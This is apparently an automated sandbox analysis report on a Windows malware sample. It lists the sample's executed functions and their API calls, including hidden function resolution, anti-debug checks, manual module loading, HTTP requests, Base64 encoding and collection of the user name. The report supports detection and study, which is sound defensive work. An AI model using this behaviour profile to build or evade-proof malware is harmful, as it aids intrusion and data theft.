lstrcpy lstrlen lstrcpy lstrcat 15660->15662 15663 74a8a0 lstrcpy 15660->15663 15661->15110 15662->15660 15663->15660 15665 74a7a0 lstrcpy 15664->15665 15666 7451b5 15665->15666 15667 731590 lstrcpy 15666->15667 15668 7451c6 15667->15668 15683 735100 15668->15683 15670 7451cf 15670->15122 15674 747720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15671->15674 15673 7476b9 15673->15546 15673->15547 15675 747765 RegQueryValueExA 15674->15675 15676 747780 RegCloseKey 15674->15676 15675->15676 15677 747793 15676->15677 15677->15673 15678->15558 15680 748a0c 15679->15680 15681 7489f9 GetProcessHeap HeapFree 15679->15681 15680->15593 15681->15680 15682->15593 15684 74a7a0 lstrcpy 15683->15684 15685 735119 15684->15685 15686 7347b0 2 API calls 15685->15686 15687 735125 15686->15687 15843 748ea0 15687->15843 15689 735184 15690 735192 lstrlen 15689->15690 15691 7351a5 15690->15691 15692 748ea0 4 API calls 15691->15692 15693 7351b6 15692->15693 15694 74a740 lstrcpy 15693->15694 15695 7351c9 15694->15695 15696 74a740 lstrcpy 15695->15696 15697 7351d6 15696->15697 15698 74a740 lstrcpy 15697->15698 15699 7351e3 15698->15699 15700 74a740 lstrcpy 15699->15700 15701 7351f0 15700->15701 15702 74a740 lstrcpy 15701->15702 15703 7351fd InternetOpenA StrCmpCA 15702->15703 15704 73522f 15703->15704 15705 7358c4 InternetCloseHandle 15704->15705 15706 748b60 3 API calls 15704->15706 15712 7358d9 ctype 15705->15712 15707 73524e 15706->15707 15708 74a920 3 API calls 15707->15708 15709 735261 15708->15709 15710 74a8a0 lstrcpy 15709->15710 15711 73526a 15710->15711 15713 74a9b0 4 API calls 15711->15713 15716 74a7a0 lstrcpy 15712->15716 15714 7352ab 15713->15714 15715 74a920 3 API calls 15714->15715 15717 7352b2 15715->15717 15724 735913 15716->15724 15718 74a9b0 4 API calls 15717->15718 15719 7352b9 15718->15719 15720 74a8a0 lstrcpy 15719->15720 15721 7352c2 15720->15721 15722 74a9b0 4 API calls 15721->15722 15723 735303 15722->15723 15725 74a920 3 API calls 15723->15725 15724->15670 15726 73530a 15725->15726 15727 74a8a0 lstrcpy 15726->15727 15728 735313 15727->15728 15729 735329 InternetConnectA 15728->15729 15729->15705 15730 735359 HttpOpenRequestA 15729->15730 15732 7358b7 InternetCloseHandle 15730->15732 15733 7353b7 15730->15733 15732->15705 15734 74a9b0 4 API calls 15733->15734 15735 7353cb 15734->15735 15736 74a8a0 lstrcpy 15735->15736 15737 7353d4 15736->15737 15738 74a920 3 API calls 15737->15738 15739 7353f2 15738->15739 15740 74a8a0 lstrcpy 15739->15740 15741 7353fb 15740->15741 15742 74a9b0 4 API calls 15741->15742 15743 73541a 15742->15743 15744 74a8a0 lstrcpy 15743->15744 15745 735423 15744->15745 15746 74a9b0 4 API calls 15745->15746 15747 735444 15746->15747 15748 74a8a0 lstrcpy 15747->15748 15749 73544d 15748->15749 15750 74a9b0 4 API calls 15749->15750 15751 73546e 15750->15751 15844 748ead CryptBinaryToStringA 15843->15844 15845 748ea9 15843->15845 15844->15845 15846 748ece GetProcessHeap RtlAllocateHeap 15844->15846 15845->15689 15846->15845 15847 748ef4 ctype 15846->15847 15848 748f05 CryptBinaryToStringA 15847->15848 15848->15845 15852->15125 16095 739880 15853->16095 15855 7398e1 15855->15132 15857 74a740 lstrcpy 15856->15857 15858 73fb16 15857->15858 16030 74a740 lstrcpy 16029->16030 16031 740266 16030->16031 16032 748de0 2 API calls 16031->16032 16033 74027b 16032->16033 16034 74a920 3 API calls 16033->16034 16035 74028b 16034->16035 16036 74a8a0 lstrcpy 16035->16036 16037 740294 16036->16037 16038 74a9b0 4 API calls 16037->16038 16096 73988e 16095->16096 16099 736fb0 16096->16099 16098 7398ad ctype 16098->15855 16102 736d40 16099->16102 16103 736d63 16102->16103 16104 736d59 16102->16104 16118 736530 16103->16118 16104->16098 16108 736dbe 16108->16104 16128 7369b0 16108->16128 16110 736e2a 16110->16104 16111 736ef7 16110->16111 16112 736ee6 VirtualFree 16110->16112 16113 736f26 FreeLibrary 16111->16113 16114 736f38 16111->16114 16117 736f41 16111->16117 16112->16111 16113->16111 16116 7489f0 2 API calls 16114->16116 16115 7489f0 2 API calls 16115->16104 16116->16117 16117->16104 16117->16115 16119 736542 16118->16119 16121 736549 16119->16121 16138 748a10 GetProcessHeap RtlAllocateHeap 16119->16138 16121->16104 16122 736660 16121->16122 16125 73668f VirtualAlloc 16122->16125 16124 736730 16126 736743 VirtualAlloc 16124->16126 16127 73673c 16124->16127 16125->16124 16125->16127 16126->16127 16127->16108 16129 7369c9 16128->16129 16132 7369d5 16128->16132 16130 736a09 LoadLibraryA 16129->16130 16129->16132 16131 736a32 16130->16131 16130->16132 16135 736ae0 16131->16135 16139 748a10 GetProcessHeap RtlAllocateHeap 16131->16139 16132->16110 16134 736ba8 GetProcAddress 16134->16132 16134->16135 16135->16132 16135->16134 16136 7489f0 2 API calls 16136->16135 16137 736a8b 16137->16132 16137->16136 16138->16121 16139->16137

                      Executed Functions

                      Function 00749860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 660 749860-749874 call 749750 663 749a93-749af2 LoadLibraryA * 5 660->663 664 74987a-749a8e call 749780 GetProcAddress * 21 660->664 666 749af4-749b08 GetProcAddress 663->666 667 749b0d-749b14 663->667 664->663 666->667 669 749b46-749b4d 667->669 670 749b16-749b41 GetProcAddress * 2 667->670 671 749b4f-749b63 GetProcAddress 669->671 672 749b68-749b6f 669->672 670->669 671->672 673 749b71-749b84 GetProcAddress 672->673 674 749b89-749b90 672->674 673->674 675 749bc1-749bc2 674->675 676 749b92-749bbc GetProcAddress * 2 674->676 676->675
                      APIs
                      • GetProcAddress.KERNEL32(75900000,013E0750), ref: 007498A1
                      • GetProcAddress.KERNEL32(75900000,013E0798), ref: 007498BA
                      • GetProcAddress.KERNEL32(75900000,013E0618), ref: 007498D2
                      • GetProcAddress.KERNEL32(75900000,013E0630), ref: 007498EA
                      • GetProcAddress.KERNEL32(75900000,013E0558), ref: 00749903
                      • GetProcAddress.KERNEL32(75900000,013E8940), ref: 0074991B
                      • GetProcAddress.KERNEL32(75900000,013D66A0), ref: 00749933
                      • GetProcAddress.KERNEL32(75900000,013D6720), ref: 0074994C
                      • GetProcAddress.KERNEL32(75900000,013E0810), ref: 00749964
                      • GetProcAddress.KERNEL32(75900000,013E07B0), ref: 0074997C
                      • GetProcAddress.KERNEL32(75900000,013E0570), ref: 00749995
                      • GetProcAddress.KERNEL32(75900000,013E07C8), ref: 007499AD
                      • GetProcAddress.KERNEL32(75900000,013D68A0), ref: 007499C5
                      • GetProcAddress.KERNEL32(75900000,013E07F8), ref: 007499DE
                      • GetProcAddress.KERNEL32(75900000,013E07E0), ref: 007499F6
                      • GetProcAddress.KERNEL32(75900000,013D6980), ref: 00749A0E
                      • GetProcAddress.KERNEL32(75900000,013E05A0), ref: 00749A27
                      • GetProcAddress.KERNEL32(75900000,013E08E8), ref: 00749A3F
                      • GetProcAddress.KERNEL32(75900000,013D69E0), ref: 00749A57
                      • GetProcAddress.KERNEL32(75900000,013E0888), ref: 00749A70
                      • GetProcAddress.KERNEL32(75900000,013D66E0), ref: 00749A88
                      • LoadLibraryA.KERNEL32(013E0918,?,00746A00), ref: 00749A9A
                      • LoadLibraryA.KERNEL32(013E0900,?,00746A00), ref: 00749AAB
                      • LoadLibraryA.KERNEL32(013E08A0,?,00746A00), ref: 00749ABD
                      • LoadLibraryA.KERNEL32(013E0870,?,00746A00), ref: 00749ACF
                      • LoadLibraryA.KERNEL32(013E08B8,?,00746A00), ref: 00749AE0
                      • GetProcAddress.KERNEL32(75070000,013E0858), ref: 00749B02
                      • GetProcAddress.KERNEL32(75FD0000,013E08D0), ref: 00749B23
                      • GetProcAddress.KERNEL32(75FD0000,013E8CE8), ref: 00749B3B
                      • GetProcAddress.KERNEL32(75A50000,013E8D60), ref: 00749B5D
                      • GetProcAddress.KERNEL32(74E50000,013D6900), ref: 00749B7E
                      • GetProcAddress.KERNEL32(76E80000,013E8840), ref: 00749B9F
                      • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00749BB6
                      Strings
                      • NtQueryInformationProcess, xrefs: 00749BAA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: NtQueryInformationProcess
                      • API String ID: 2238633743-2781105232
                      • Opcode ID: 16f3a19a90fe5e752a9d1c44e1e979b3cf32036954799e9b25c7340cc4a75a35
                      • Instruction ID: 6383a1bc5514ee6f439ef5f8b09a4e6b0de778a4e1fd888e881c067a08f67548
                      • Opcode Fuzzy Hash: 16f3a19a90fe5e752a9d1c44e1e979b3cf32036954799e9b25c7340cc4a75a35
                      • Instruction Fuzzy Hash: 8DA12DB792C2409FD348DFA8ED8999E37F9F7C8701B04451AA61D83264E73998C1EB53
                      Function 007345C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 764 7345c0-734695 RtlAllocateHeap 781 7346a0-7346a6 764->781 782 73474f-7347a9 VirtualProtect 781->782 783 7346ac-73474a 781->783 783->781
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0073460F
                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0073479C
                      Strings
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007345DD
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007346D8
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007346AC
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0073471E
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007345C7
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734643
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734662
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007345F3
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734638
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0073473F
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734622
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734683
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734713
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734770
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007345D2
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007346B7
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734617
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734678
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0073474F
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007346CD
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007345E8
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0073462D
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007346C2
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734734
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734729
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734657
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0073466D
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00734765
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0073475A
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0073477B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeapProtectVirtual
                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                      • API String ID: 1542196881-2218711628
                      • Opcode ID: dab7a31289c678a22fa56e72d79f7ac5d0c635fdb1547926db36e7907630c3ee
                      • Instruction ID: 7da24cf3aa1d11b3ea13b348db9a7eb88378d5e83a2bf8ce64f040d43ade0637
                      • Opcode Fuzzy Hash: dab7a31289c678a22fa56e72d79f7ac5d0c635fdb1547926db36e7907630c3ee
                      • Instruction Fuzzy Hash: AC4103B07F7744AAC628BBE4885EDFD76665F42706F595040AC04522DECAF8754CC922
                      Function 00736280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                        • Part of subcall function 007347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00734839
                        • Part of subcall function 007347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00734849
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      • InternetOpenA.WININET(00750DFE,00000001,00000000,00000000,00000000), ref: 007362E1
                      • StrCmpCA.SHLWAPI(?,013EE290), ref: 00736303
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00736335
                      • HttpOpenRequestA.WININET(00000000,GET,?,013EDC28,00000000,00000000,00400100,00000000), ref: 00736385
                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007363BF
                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007363D1
                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 007363FD
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0073646D
                      • InternetCloseHandle.WININET(00000000), ref: 007364EF
                      • InternetCloseHandle.WININET(00000000), ref: 007364F9
                      • InternetCloseHandle.WININET(00000000), ref: 00736503
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                      • String ID: ERROR$ERROR$GET
                      • API String ID: 3749127164-2509457195
                      • Opcode ID: 3f6b3a868f510be72aba3f0dbb41893e2b6d89802a2fb8202b64e3a6a1ef4eef
                      • Instruction ID: 457cc17c6f8fdcafd44b5d1a77931676667fbf6758abb1eb4c519170c449d6e8
                      • Opcode Fuzzy Hash: 3f6b3a868f510be72aba3f0dbb41893e2b6d89802a2fb8202b64e3a6a1ef4eef
                      • Instruction Fuzzy Hash: 25717F71A50218FBEB24DFA0CC49BEE77B8FB44701F108198F5096B191DBB86A85CF52
                      Function 00747850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007311B7), ref: 00747880
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00747887
                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0074789F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateNameProcessUser
                      • String ID:
                      • API String ID: 1296208442-0
                      • Opcode ID: 216afa4244accb8a1f47522f1df92c8607f07c20e087751880ca1875272c3b3e
                      • Instruction ID: 0fc1000819bb2c733b4fe4b34115e5f1dd076d559b116801c8553f402dc48a1b
                      • Opcode Fuzzy Hash: 216afa4244accb8a1f47522f1df92c8607f07c20e087751880ca1875272c3b3e
                      • Instruction Fuzzy Hash: C1F044F2D44208AFC714DF94DD45BAEBBB8E744711F100159F605A2680C7781544CBA2
                      Function 00731160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
